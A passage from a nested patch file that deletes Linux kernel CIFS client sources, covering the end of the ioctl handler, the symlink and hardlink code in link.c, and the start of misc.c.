+-						    &ExtAttrBits, &ExtAttrMask);
+-				if (rc == 0)
+-					rc = put_user(ExtAttrBits &
+-						FS_FL_USER_VISIBLE,
+-						(int __user *)arg);
+-				if (rc != -EOPNOTSUPP)
+-					break;
+-			}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-#endif /* CONFIG_CIFS_POSIX */
+-			rc = 0;
+-			if (CIFS_I(inode)->cifsAttrs & ATTR_COMPRESSED) {
+-				/* add in the compressed bit */
+-				ExtAttrBits = FS_COMPR_FL;
+-				rc = put_user(ExtAttrBits & FS_FL_USER_VISIBLE,
+-					      (int __user *)arg);
+-			}
+-			break;
+-		case FS_IOC_SETFLAGS:
+-			if (pSMBFile == NULL)
+-				break;
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			/* caps = le64_to_cpu(tcon->fsUnixInfo.Capability); */
+-
+-			if (get_user(ExtAttrBits, (int __user *)arg)) {
+-				rc = -EFAULT;
+-				break;
+-			}
+-
+-			/*
+-			 * if (CIFS_UNIX_EXTATTR_CAP & caps)
+-			 *	rc = CIFSSetExtAttr(xid, tcon,
+-			 *		       pSMBFile->fid.netfid,
+-			 *		       extAttrBits,
+-			 *		       &ExtAttrMask);
+-			 * if (rc != -EOPNOTSUPP)
+-			 *	break;
+-			 */
+-
+-			/* Currently only flag we can set is compressed flag */
+-			if ((ExtAttrBits & FS_COMPR_FL) == 0)
+-				break;
+-
+-			/* Try to set compress flag */
+-			if (tcon->ses->server->ops->set_compression) {
+-				rc = tcon->ses->server->ops->set_compression(
+-							xid, tcon, pSMBFile);
+-				cifs_dbg(FYI, "set compress flag rc %d\n", rc);
+-			}
+-			break;
+-		case CIFS_IOC_COPYCHUNK_FILE:
+-			rc = cifs_ioctl_copychunk(xid, filep, arg);
+-			break;
+-		case CIFS_QUERY_INFO:
+-			rc = cifs_ioctl_query_info(xid, filep, arg);
+-			break;
+-		case CIFS_IOC_SET_INTEGRITY:
+-			if (pSMBFile == NULL)
+-				break;
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			if (tcon->ses->server->ops->set_integrity)
+-				rc = tcon->ses->server->ops->set_integrity(xid,
+-						tcon, pSMBFile);
+-			else
+-				rc = -EOPNOTSUPP;
+-			break;
+-		case CIFS_IOC_GET_MNT_INFO:
+-			if (pSMBFile == NULL)
+-				break;
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			rc = smb_mnt_get_fsinfo(xid, tcon, (void __user *)arg);
+-			break;
+-		case CIFS_ENUMERATE_SNAPSHOTS:
+-			if (pSMBFile == NULL)
+-				break;
+-			if (arg == 0) {
+-				rc = -EINVAL;
+-				goto cifs_ioc_exit;
+-			}
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			if (tcon->ses->server->ops->enum_snapshots)
+-				rc = tcon->ses->server->ops->enum_snapshots(xid, tcon,
+-						pSMBFile, (void __user *)arg);
+-			else
+-				rc = -EOPNOTSUPP;
+-			break;
+-		case CIFS_DUMP_KEY:
+-			/*
+-			 * Dump encryption keys. This is an old ioctl that only
+-			 * handles AES-128-{CCM,GCM}.
+-			 */
+-			if (pSMBFile == NULL)
+-				break;
+-			if (!capable(CAP_SYS_ADMIN)) {
+-				rc = -EACCES;
+-				break;
+-			}
+-
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			if (!smb3_encryption_required(tcon)) {
+-				rc = -EOPNOTSUPP;
+-				break;
+-			}
+-			pkey_inf.cipher_type =
+-				le16_to_cpu(tcon->ses->server->cipher_type);
+-			pkey_inf.Suid = tcon->ses->Suid;
+-			memcpy(pkey_inf.auth_key, tcon->ses->auth_key.response,
+-					16 /* SMB2_NTLMV2_SESSKEY_SIZE */);
+-			memcpy(pkey_inf.smb3decryptionkey,
+-			      tcon->ses->smb3decryptionkey, SMB3_SIGN_KEY_SIZE);
+-			memcpy(pkey_inf.smb3encryptionkey,
+-			      tcon->ses->smb3encryptionkey, SMB3_SIGN_KEY_SIZE);
+-			if (copy_to_user((void __user *)arg, &pkey_inf,
+-					sizeof(struct smb3_key_debug_info)))
+-				rc = -EFAULT;
+-			else
+-				rc = 0;
+-			break;
+-		case CIFS_DUMP_FULL_KEY:
+-			/*
+-			 * Dump encryption keys (handles any key sizes)
+-			 */
+-			if (pSMBFile == NULL)
+-				break;
+-			if (!capable(CAP_SYS_ADMIN)) {
+-				rc = -EACCES;
+-				break;
+-			}
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			rc = cifs_dump_full_key(tcon, (void __user *)arg);
+-			break;
+-		case CIFS_IOC_NOTIFY:
+-			if (!S_ISDIR(inode->i_mode)) {
+-				/* Notify can only be done on directories */
+-				rc = -EOPNOTSUPP;
+-				break;
+-			}
+-			cifs_sb = CIFS_SB(inode->i_sb);
+-			tlink = cifs_sb_tlink(cifs_sb);
+-			if (IS_ERR(tlink)) {
+-				rc = PTR_ERR(tlink);
+-				break;
+-			}
+-			tcon = tlink_tcon(tlink);
+-			if (tcon && tcon->ses->server->ops->notify) {
+-				rc = tcon->ses->server->ops->notify(xid,
+-						filep, (void __user *)arg,
+-						false /* no ret data */);
+-				cifs_dbg(FYI, "ioctl notify rc %d\n", rc);
+-			} else
+-				rc = -EOPNOTSUPP;
+-			cifs_put_tlink(tlink);
+-			break;
+-		case CIFS_IOC_NOTIFY_INFO:
+-			if (!S_ISDIR(inode->i_mode)) {
+-				/* Notify can only be done on directories */
+-				rc = -EOPNOTSUPP;
+-				break;
+-			}
+-			cifs_sb = CIFS_SB(inode->i_sb);
+-			tlink = cifs_sb_tlink(cifs_sb);
+-			if (IS_ERR(tlink)) {
+-				rc = PTR_ERR(tlink);
+-				break;
+-			}
+-			tcon = tlink_tcon(tlink);
+-			if (tcon && tcon->ses->server->ops->notify) {
+-				rc = tcon->ses->server->ops->notify(xid,
+-						filep, (void __user *)arg,
+-						true /* return details */);
+-				cifs_dbg(FYI, "ioctl notify info rc %d\n", rc);
+-			} else
+-				rc = -EOPNOTSUPP;
+-			cifs_put_tlink(tlink);
+-			break;
+-		case CIFS_IOC_SHUTDOWN:
+-			rc = cifs_shutdown(inode->i_sb, arg);
+-			break;
+-		default:
+-			cifs_dbg(FYI, "unsupported ioctl\n");
+-			break;
+-	}
+-cifs_ioc_exit:
+-	free_xid(xid);
+-	return rc;
+-}
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+deleted file mode 100644
+index c0f101fc1e5d0..0000000000000
+--- a/fs/cifs/link.c
++++ /dev/null
+@@ -1,650 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/namei.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "smb2proto.h"
+-#include "cifs_ioctl.h"
+-
+-/*
+- * M-F Symlink Functions - Begin
+- */
+-
+-#define CIFS_MF_SYMLINK_LEN_OFFSET (4+1)
+-#define CIFS_MF_SYMLINK_MD5_OFFSET (CIFS_MF_SYMLINK_LEN_OFFSET+(4+1))
+-#define CIFS_MF_SYMLINK_LINK_OFFSET (CIFS_MF_SYMLINK_MD5_OFFSET+(32+1))
+-#define CIFS_MF_SYMLINK_LINK_MAXLEN (1024)
+-#define CIFS_MF_SYMLINK_FILE_SIZE \
+-	(CIFS_MF_SYMLINK_LINK_OFFSET + CIFS_MF_SYMLINK_LINK_MAXLEN)
+-
+-#define CIFS_MF_SYMLINK_LEN_FORMAT "XSym\n%04u\n"
+-#define CIFS_MF_SYMLINK_MD5_FORMAT "%16phN\n"
+-#define CIFS_MF_SYMLINK_MD5_ARGS(md5_hash) md5_hash
+-
+-static int
+-symlink_hash(unsigned int link_len, const char *link_str, u8 *md5_hash)
+-{
+-	int rc;
+-	struct shash_desc *md5 = NULL;
+-
+-	rc = cifs_alloc_hash("md5", &md5);
+-	if (rc)
+-		goto symlink_hash_err;
+-
+-	rc = crypto_shash_init(md5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init md5 shash\n", __func__);
+-		goto symlink_hash_err;
+-	}
+-	rc = crypto_shash_update(md5, link_str, link_len);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with link_str\n", __func__);
+-		goto symlink_hash_err;
+-	}
+-	rc = crypto_shash_final(md5, md5_hash);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
+-
+-symlink_hash_err:
+-	cifs_free_hash(&md5);
+-	return rc;
+-}
+-
+-static int
+-parse_mf_symlink(const u8 *buf, unsigned int buf_len, unsigned int *_link_len,
+-		 char **_link_str)
+-{
+-	int rc;
+-	unsigned int link_len;
+-	const char *md5_str1;
+-	const char *link_str;
+-	u8 md5_hash[16];
+-	char md5_str2[34];
+-
+-	if (buf_len != CIFS_MF_SYMLINK_FILE_SIZE)
+-		return -EINVAL;
+-
+-	md5_str1 = (const char *)&buf[CIFS_MF_SYMLINK_MD5_OFFSET];
+-	link_str = (const char *)&buf[CIFS_MF_SYMLINK_LINK_OFFSET];
+-
+-	rc = sscanf(buf, CIFS_MF_SYMLINK_LEN_FORMAT, &link_len);
+-	if (rc != 1)
+-		return -EINVAL;
+-
+-	if (link_len > CIFS_MF_SYMLINK_LINK_MAXLEN)
+-		return -EINVAL;
+-
+-	rc = symlink_hash(link_len, link_str, md5_hash);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: MD5 hash failure: %d\n", __func__, rc);
+-		return rc;
+-	}
+-
+-	scnprintf(md5_str2, sizeof(md5_str2),
+-		  CIFS_MF_SYMLINK_MD5_FORMAT,
+-		  CIFS_MF_SYMLINK_MD5_ARGS(md5_hash));
+-
+-	if (strncmp(md5_str1, md5_str2, 17) != 0)
+-		return -EINVAL;
+-
+-	if (_link_str) {
+-		*_link_str = kstrndup(link_str, link_len, GFP_KERNEL);
+-		if (!*_link_str)
+-			return -ENOMEM;
+-	}
+-
+-	*_link_len = link_len;
+-	return 0;
+-}
+-
+-static int
+-format_mf_symlink(u8 *buf, unsigned int buf_len, const char *link_str)
+-{
+-	int rc;
+-	unsigned int link_len;
+-	unsigned int ofs;
+-	u8 md5_hash[16];
+-
+-	if (buf_len != CIFS_MF_SYMLINK_FILE_SIZE)
+-		return -EINVAL;
+-
+-	link_len = strlen(link_str);
+-
+-	if (link_len > CIFS_MF_SYMLINK_LINK_MAXLEN)
+-		return -ENAMETOOLONG;
+-
+-	rc = symlink_hash(link_len, link_str, md5_hash);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: MD5 hash failure: %d\n", __func__, rc);
+-		return rc;
+-	}
+-
+-	scnprintf(buf, buf_len,
+-		  CIFS_MF_SYMLINK_LEN_FORMAT CIFS_MF_SYMLINK_MD5_FORMAT,
+-		  link_len,
+-		  CIFS_MF_SYMLINK_MD5_ARGS(md5_hash));
+-
+-	ofs = CIFS_MF_SYMLINK_LINK_OFFSET;
+-	memcpy(buf + ofs, link_str, link_len);
+-
+-	ofs += link_len;
+-	if (ofs < CIFS_MF_SYMLINK_FILE_SIZE) {
+-		buf[ofs] = '\n';
+-		ofs++;
+-	}
+-
+-	while (ofs < CIFS_MF_SYMLINK_FILE_SIZE) {
+-		buf[ofs] = ' ';
+-		ofs++;
+-	}
+-
+-	return 0;
+-}
+-
+-bool
+-couldbe_mf_symlink(const struct cifs_fattr *fattr)
+-{
+-	if (!S_ISREG(fattr->cf_mode))
+-		/* it's not a symlink */
+-		return false;
+-
+-	if (fattr->cf_eof != CIFS_MF_SYMLINK_FILE_SIZE)
+-		/* it's not a symlink */
+-		return false;
+-
+-	return true;
+-}
+-
+-static int
+-create_mf_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		  struct cifs_sb_info *cifs_sb, const char *fromName,
+-		  const char *toName)
+-{
+-	int rc;
+-	u8 *buf;
+-	unsigned int bytes_written = 0;
+-
+-	buf = kmalloc(CIFS_MF_SYMLINK_FILE_SIZE, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	rc = format_mf_symlink(buf, CIFS_MF_SYMLINK_FILE_SIZE, toName);
+-	if (rc)
+-		goto out;
+-
+-	if (tcon->ses->server->ops->create_mf_symlink)
+-		rc = tcon->ses->server->ops->create_mf_symlink(xid, tcon,
+-					cifs_sb, fromName, buf, &bytes_written);
+-	else
+-		rc = -EOPNOTSUPP;
+-
+-	if (rc)
+-		goto out;
+-
+-	if (bytes_written != CIFS_MF_SYMLINK_FILE_SIZE)
+-		rc = -EIO;
+-out:
+-	kfree(buf);
+-	return rc;
+-}
+-
+-int
+-check_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		 struct cifs_sb_info *cifs_sb, struct cifs_fattr *fattr,
+-		 const unsigned char *path)
+-{
+-	int rc;
+-	u8 *buf = NULL;
+-	unsigned int link_len = 0;
+-	unsigned int bytes_read = 0;
+-	char *symlink = NULL;
+-
+-	if (!couldbe_mf_symlink(fattr))
+-		/* it's not a symlink */
+-		return 0;
+-
+-	buf = kmalloc(CIFS_MF_SYMLINK_FILE_SIZE, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	if (tcon->ses->server->ops->query_mf_symlink)
+-		rc = tcon->ses->server->ops->query_mf_symlink(xid, tcon,
+-					      cifs_sb, path, buf, &bytes_read);
+-	else
+-		rc = -ENOSYS;
+-
+-	if (rc)
+-		goto out;
+-
+-	if (bytes_read == 0) /* not a symlink */
+-		goto out;
+-
+-	rc = parse_mf_symlink(buf, bytes_read, &link_len, &symlink);
+-	if (rc == -EINVAL) {
+-		/* it's not a symlink */
+-		rc = 0;
+-		goto out;
+-	}
+-
+-	if (rc != 0)
+-		goto out;
+-
+-	/* it is a symlink */
+-	fattr->cf_eof = link_len;
+-	fattr->cf_mode &= ~S_IFMT;
+-	fattr->cf_mode |= S_IFLNK | S_IRWXU | S_IRWXG | S_IRWXO;
+-	fattr->cf_dtype = DT_LNK;
+-	fattr->cf_symlink_target = symlink;
+-out:
+-	kfree(buf);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-/*
+- * SMB 1.0 Protocol specific functions
+- */
+-
+-int
+-cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		      struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-		      char *pbuf, unsigned int *pbytes_read)
+-{
+-	int rc;
+-	int oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-	int buf_type = CIFS_NO_BUFFER;
+-	FILE_ALL_INFO file_info;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_READ,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, &file_info);
+-	if (rc)
+-		return rc;
+-
+-	if (file_info.EndOfFile != cpu_to_le64(CIFS_MF_SYMLINK_FILE_SIZE)) {
+-		rc = -ENOENT;
+-		/* it's not a symlink */
+-		goto out;
+-	}
+-
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
+-
+-	rc = CIFSSMBRead(xid, &io_parms, pbytes_read, &pbuf, &buf_type);
+-out:
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-	return rc;
+-}
+-
+-int
+-cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		       struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-		       char *pbuf, unsigned int *pbytes_written)
+-{
+-	int rc;
+-	int oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_CREATE,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc)
+-		return rc;
+-
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
+-
+-	rc = CIFSSMBWrite(xid, &io_parms, pbytes_written, pbuf);
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-/*
+- * SMB 2.1/SMB3 Protocol specific functions
+- */
+-int
+-smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		      struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-		      char *pbuf, unsigned int *pbytes_read)
+-{
+-	int rc;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-	int buf_type = CIFS_NO_BUFFER;
+-	__le16 *utf16_path;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct smb2_file_all_info *pfile_info = NULL;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.path = path,
+-		.desired_access = GENERIC_READ,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.fid = &fid,
+-	};
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (utf16_path == NULL)
+-		return -ENOMEM;
+-
+-	pfile_info = kzalloc(sizeof(struct smb2_file_all_info) + PATH_MAX * 2,
+-			     GFP_KERNEL);
+-
+-	if (pfile_info == NULL) {
+-		kfree(utf16_path);
+-		return  -ENOMEM;
+-	}
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, pfile_info, NULL,
+-		       NULL, NULL);
+-	if (rc)
+-		goto qmf_out_open_fail;
+-
+-	if (pfile_info->EndOfFile != cpu_to_le64(CIFS_MF_SYMLINK_FILE_SIZE)) {
+-		/* it's not a symlink */
+-		rc = -ENOENT; /* Is there a better rc to return? */
+-		goto qmf_out;
+-	}
+-
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
+-	io_parms.persistent_fid = fid.persistent_fid;
+-	io_parms.volatile_fid = fid.volatile_fid;
+-	rc = SMB2_read(xid, &io_parms, pbytes_read, &pbuf, &buf_type);
+-qmf_out:
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-qmf_out_open_fail:
+-	kfree(utf16_path);
+-	kfree(pfile_info);
+-	return rc;
+-}
+-
+-int
+-smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		       struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-		       char *pbuf, unsigned int *pbytes_written)
+-{
+-	int rc;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-	__le16 *utf16_path;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct kvec iov[2];
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.path = path,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_CREATE,
+-		.fid = &fid,
+-		.mode = 0644,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+-		       NULL, NULL);
+-	if (rc) {
+-		kfree(utf16_path);
+-		return rc;
+-	}
+-
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
+-	io_parms.persistent_fid = fid.persistent_fid;
+-	io_parms.volatile_fid = fid.volatile_fid;
+-
+-	/* iov[0] is reserved for smb header */
+-	iov[1].iov_base = pbuf;
+-	iov[1].iov_len = CIFS_MF_SYMLINK_FILE_SIZE;
+-
+-	rc = SMB2_write(xid, &io_parms, pbytes_written, iov, 1);
+-
+-	/* Make sure we wrote all of the symlink data */
+-	if ((rc == 0) && (*pbytes_written != CIFS_MF_SYMLINK_FILE_SIZE))
+-		rc = -EIO;
+-
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-
+-	kfree(utf16_path);
+-	return rc;
+-}
+-
+-/*
+- * M-F Symlink Functions - End
+- */
+-
+-int
+-cifs_hardlink(struct dentry *old_file, struct inode *inode,
+-	      struct dentry *direntry)
+-{
+-	int rc = -EACCES;
+-	unsigned int xid;
+-	const char *from_name, *to_name;
+-	void *page1, *page2;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifsInodeInfo *cifsInode;
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-	page1 = alloc_dentry_path();
+-	page2 = alloc_dentry_path();
+-
+-	from_name = build_path_from_dentry(old_file, page1);
+-	if (IS_ERR(from_name)) {
+-		rc = PTR_ERR(from_name);
+-		goto cifs_hl_exit;
+-	}
+-	to_name = build_path_from_dentry(direntry, page2);
+-	if (IS_ERR(to_name)) {
+-		rc = PTR_ERR(to_name);
+-		goto cifs_hl_exit;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tcon->unix_ext)
+-		rc = CIFSUnixCreateHardLink(xid, tcon, from_name, to_name,
+-					    cifs_sb->local_nls,
+-					    cifs_remap(cifs_sb));
+-	else {
+-#else
+-	{
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		server = tcon->ses->server;
+-		if (!server->ops->create_hardlink) {
+-			rc = -ENOSYS;
+-			goto cifs_hl_exit;
+-		}
+-		rc = server->ops->create_hardlink(xid, tcon, from_name, to_name,
+-						  cifs_sb);
+-		if ((rc == -EIO) || (rc == -EINVAL))
+-			rc = -EOPNOTSUPP;
+-	}
+-
+-	d_drop(direntry);	/* force new lookup from server of target */
+-
+-	/*
+-	 * if source file is cached (oplocked) revalidate will not go to server
+-	 * until the file is closed or oplock broken so update nlinks locally
+-	 */
+-	if (d_really_is_positive(old_file)) {
+-		cifsInode = CIFS_I(d_inode(old_file));
+-		if (rc == 0) {
+-			spin_lock(&d_inode(old_file)->i_lock);
+-			inc_nlink(d_inode(old_file));
+-			spin_unlock(&d_inode(old_file)->i_lock);
+-
+-			/*
+-			 * parent dir timestamps will update from srv within a
+-			 * second, would it really be worth it to set the parent
+-			 * dir cifs inode time to zero to force revalidate
+-			 * (faster) for it too?
+-			 */
+-		}
+-		/*
+-		 * if not oplocked will force revalidate to get info on source
+-		 * file from srv.  Note Samba server prior to 4.2 has bug -
+-		 * not updating src file ctime on hardlinks but Windows servers
+-		 * handle it properly
+-		 */
+-		cifsInode->time = 0;
+-
+-		/*
+-		 * Will update parent dir timestamps from srv within a second.
+-		 * Would it really be worth it to set the parent dir (cifs
+-		 * inode) time field to zero to force revalidate on parent
+-		 * directory faster ie
+-		 *
+-		 * CIFS_I(inode)->time = 0;
+-		 */
+-	}
+-
+-cifs_hl_exit:
+-	free_dentry_path(page1);
+-	free_dentry_path(page2);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-int
+-cifs_symlink(struct user_namespace *mnt_userns, struct inode *inode,
+-	     struct dentry *direntry, const char *symname)
+-{
+-	int rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	const char *full_path;
+-	void *page;
+-	struct inode *newinode = NULL;
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	page = alloc_dentry_path();
+-	if (!page)
+-		return -ENOMEM;
+-
+-	xid = get_xid();
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		goto symlink_exit;
+-	}
+-	pTcon = tlink_tcon(tlink);
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto symlink_exit;
+-	}
+-
+-	cifs_dbg(FYI, "Full path: %s\n", full_path);
+-	cifs_dbg(FYI, "symname is %s\n", symname);
+-
+-	/* BB what if DFS and this volume is on different share? BB */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS)
+-		rc = create_mf_symlink(xid, pTcon, cifs_sb, full_path, symname);
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	else if (pTcon->unix_ext)
+-		rc = CIFSUnixCreateSymLink(xid, pTcon, full_path, symname,
+-					   cifs_sb->local_nls,
+-					   cifs_remap(cifs_sb));
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	/* else
+-	   rc = CIFSCreateReparseSymLink(xid, pTcon, fromName, toName,
+-					cifs_sb_target->local_nls); */
+-
+-	if (rc == 0) {
+-		if (pTcon->posix_extensions)
+-			rc = smb311_posix_get_inode_info(&newinode, full_path, inode->i_sb, xid);
+-		else if (pTcon->unix_ext)
+-			rc = cifs_get_inode_info_unix(&newinode, full_path,
+-						      inode->i_sb, xid);
+-		else
+-			rc = cifs_get_inode_info(&newinode, full_path, NULL,
+-						 inode->i_sb, xid, NULL);
+-
+-		if (rc != 0) {
+-			cifs_dbg(FYI, "Create symlink ok, getinodeinfo fail rc = %d\n",
+-				 rc);
+-		} else {
+-			d_instantiate(direntry, newinode);
+-		}
+-	}
+-symlink_exit:
+-	free_dentry_path(page);
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-	return rc;
+-}
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+deleted file mode 100644
+index 31e06133acc3d..0000000000000
+--- a/fs/cifs/misc.c
++++ /dev/null
+@@ -1,1434 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include <linux/slab.h>
+-#include <linux/ctype.h>
+-#include <linux/mempool.h>
+-#include <linux/vmalloc.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "smberr.h"
+-#include "nterr.h"
+-#include "cifs_unicode.h"
+-#include "smb2pdu.h"
+-#include "cifsfs.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dns_resolve.h"
+-#include "dfs_cache.h"
+-#endif
+-#include "fs_context.h"
+-#include "cached_dir.h"
+-
+-extern mempool_t *cifs_sm_req_poolp;
+-extern mempool_t *cifs_req_poolp;
+-
+-/* The xid serves as a useful identifier for each incoming vfs request,
+-   in a similar way to the mid which is useful to track each sent smb,
+-   and CurrentXid can also provide a running counter (although it
+-   will eventually wrap past zero) of the total vfs operations handled
+-   since the cifs fs was mounted */
+-
+-unsigned int
+-_get_xid(void)
+-{
+-	unsigned int xid;
+-
+-	spin_lock(&GlobalMid_Lock);
+-	GlobalTotalActiveXid++;
+-
+-	/* keep high water mark for number of simultaneous ops in filesystem */
+-	if (GlobalTotalActiveXid > GlobalMaxActiveXid)
+-		GlobalMaxActiveXid = GlobalTotalActiveXid;
+-	if (GlobalTotalActiveXid > 65000)
+-		cifs_dbg(FYI, "warning: more than 65000 requests active\n");
+-	xid = GlobalCurrentXid++;
+-	spin_unlock(&GlobalMid_Lock);
+-	return xid;
+-}
+-
+-void
+-_free_xid(unsigned int xid)
+-{
+-	spin_lock(&GlobalMid_Lock);
+-	/* if (GlobalTotalActiveXid == 0)
+-		BUG(); */
+-	GlobalTotalActiveXid--;
+-	spin_unlock(&GlobalMid_Lock);
+-}
+-
+-struct cifs_ses *
+-sesInfoAlloc(void)
+-{
+-	struct cifs_ses *ret_buf;
+-
+-	ret_buf = kzalloc(sizeof(struct cifs_ses), GFP_KERNEL);
+-	if (ret_buf) {
+-		atomic_inc(&sesInfoAllocCount);
+-		spin_lock_init(&ret_buf->ses_lock);
+-		ret_buf->ses_status = SES_NEW;
+-		++ret_buf->ses_count;
+-		INIT_LIST_HEAD(&ret_buf->smb_ses_list);
+-		INIT_LIST_HEAD(&ret_buf->tcon_list);
